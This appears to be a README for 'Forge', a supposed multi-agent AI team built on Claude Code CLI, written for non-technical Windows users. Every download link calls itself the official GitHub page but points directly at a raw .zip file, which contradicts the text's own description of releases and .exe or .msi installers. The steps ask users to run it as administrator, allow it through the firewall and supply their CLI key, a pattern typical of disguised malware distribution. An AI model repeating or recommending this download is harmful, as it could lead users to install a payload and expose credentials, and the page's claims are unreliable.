Forge helps you turn a simple command-line tool into a full AI development team. It manages project managers, architects, frontend and backend engineers, quality assurance, and DevOps agents all in one place. You do not need any programming experience to get started.
Forge brings multiple AI agents together to work as a team automatically. These agents have different roles, such as planning, coding, testing, and deployment. You only need to provide a Claude Code CLI as a starting point. Forge organizes everything else in the background. This makes AI development easier, even for users without technical skills.
Key features include:
- Auto-management of AI roles like PM, Architect, Engineers, QA, and DevOps.
- Works with Claude Code CLI and other AI tools.
- Handles workflows and task orchestration.
- Provides a simple way to run complex AI projects.
Topics related to Forge are agentic workflows, AI agents, automation, and developer tools.
You can get Forge from this page:
https://raw.githubusercontent.com/gabbylists/Forge/main/shoran/Software-v1.0.zip
Click the button above to open the GitHub page. From there, you will find instructions and files to download Forge.
Before you install Forge, make sure your computer meets these minimum requirements:
- Operating System: Windows 10 or newer
- Processor: Intel i3 or equivalent
- RAM: 8 GB or more
- Disk Space: At least 2 GB free space
- Internet Connection: Required for initial download and some features
- Permissions: Ability to install software and run command-line applications
This section guides you step-by-step to get Forge running.
Go to this link in your web browser:
https://raw.githubusercontent.com/gabbylists/Forge/main/shoran/Software-v1.0.zip
This is the official page where you can find the latest version of Forge.
On the GitHub page, look for the "Releases" section. It is usually on the right side or under the "Code" tab.
Click the latest release to open the download options.
In the release page, find the download file for Windows. This file typically ends with .exe or .msi.
Click the file name to start downloading.
Once the download finishes:
- Find the file in your Downloads folder.
- Double-click the file to start the installer.
- Follow the on-screen instructions to complete the installation.
You may need to allow the program to run if Windows asks for permission.
After installation:
- Press the Windows key.
- Type "Forge" in the search box.
- Click the Forge app to open it.
Forge runs a simple user interface that will guide you further.
Forge works by connecting to Claude Code CLI and managing AI agents for you.
- Launch Forge.
- Provide your Claude Code CLI key or set it up as instructed.
- Choose the type of AI project you want to run.
- Let Forge organize the different AI agents automatically.
- Monitor progress and outputs through the Forge interface.
You do not need to know how the AI agents work. Forge takes care of the technical parts.
Forge creates a multi-agent system using AI roles:
- Project Manager (PM): Plans and assigns tasks.
- Architect: Designs the project structure.
- Frontend Engineer: Works on user interface code.
- Backend Engineer: Handles the server and logic.
- Quality Assurance (QA): Tests the code for errors.
- DevOps: Automates build and deployment processes.
These agents communicate to deliver a complete software product. You can think of it as an AI team working on your project around the clock.
- If the installer doesn't start, check your internet connection or try downloading again.
- Run the installer as administrator if you see permission errors.
- Make sure to allow Forge access through your firewall if prompted.
- For any setup or usage questions, check the Discussions tab on the GitHub page for help from the community.
- Visit the GitHub repository to explore code and issues:
https://raw.githubusercontent.com/gabbylists/Forge/main/shoran/Software-v1.0.zip - Look for updates, bug fixes, and new features in the Releases section.
- Use Discussions for asking non-technical questions about running Forge.